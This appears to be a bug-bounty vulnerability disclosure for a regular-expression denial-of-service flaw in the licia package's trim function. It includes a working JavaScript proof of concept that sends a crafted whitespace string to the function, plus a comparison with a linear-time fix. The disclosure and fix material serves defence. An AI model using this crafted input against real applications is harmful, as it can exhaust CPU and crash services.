Inefficient Regular Expression Complexity in liriliri/licia

Valid

Reported on

Jul 18th 2021


✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the licia package. An attacker who is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar to https://nvd.nist.gov/vuln/detail/CVE-2020-28500

🕵️‍♂️ Proof of Concept

Create the following PoC file:

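// poc.js
var l = require('licia');

// Build "1" + n spaces + "1": a long whitespace run that is neither leading nor trailing.
function build_blank (n) {
    var ret = "1";
    for (var i = 0; i < n; i++) {
        ret += " ";
    }

    return ret + "1";
}

var s = build_blank(50000);
// Time a single trim() call on the crafted string.
var time = Date.now();
l.trim(s);
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost);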

Execute the following in terminal:

npm i licia
node poc.js

Check the Output:

time_cost: 2269

💥 Impact

This vulnerability is capable of exhausting system resources and can lead to crashes.

📍 Location

trim.js#L26
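An added example, not licia's code and not part of the original report: a common regex-based trim beside a linear-time replacement, run on the PoC's input shape so the cost difference and the identical results can be compared. The pattern `/^\s+|\s+$/g` and every function name below are assumptions; the report does not show the regex at trim.js#L26.

```javascript
// Added example. Not licia's source: REGEX_TRIM is an assumed pattern of the
// usual regex-trim shape; the report does not show the regex at trim.js#L26.
const REGEX_TRIM = /^\s+|\s+$/g;

// Backtracking cost: on "1" + n spaces + "1", the \s+$ branch is retried at
// every space, consumes the rest of the run, then fails at "$" because a "1"
// follows. Roughly n*n/2 character steps in total.
function regexTrim(str) {
  return str.replace(REGEX_TRIM, '');
}

// Hardened form: walk inward from both ends. Nothing is revisited by
// backtracking, so the cost is linear whatever the input looks like.
const WS = /\s/;
function linearTrim(str) {
  let start = 0;
  let end = str.length;
  while (start < end && WS.test(str[start])) start++;
  while (end > start && WS.test(str[end - 1])) end--;
  return str.slice(start, end);
}

// Same input shape as the PoC (constructed sample data).
function buildBlank(n) {
  return '1' + ' '.repeat(n) + '1';
}

function timeMs(fn, input) {
  const t0 = Date.now();
  const out = fn(input);
  return { ms: Date.now() - t0, out };
}

// Run both trims on the same input and report timings and agreement.
function compare(n) {
  const s = buildBlank(n);
  const a = timeMs(regexTrim, s);
  const b = timeMs(linearTrim, s);
  return { n, regexMs: a.ms, linearMs: b.ms, same: a.out === b.out };
}

// With a backtracking regex engine, doubling n roughly quadruples regexMs,
// while linearMs stays near zero.
for (const n of [5000, 10000, 20000]) {
  console.log(compare(n));
}
```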

We have contacted a member of the liriliri/licia team and are waiting to hear back 2 years ago
ready-research modified the report 2 years ago
RedHoodSu marked this as fixed with commit 10006a 2 years ago
RedHoodSu has been awarded the fix bounty
This vulnerability will not receive a CVE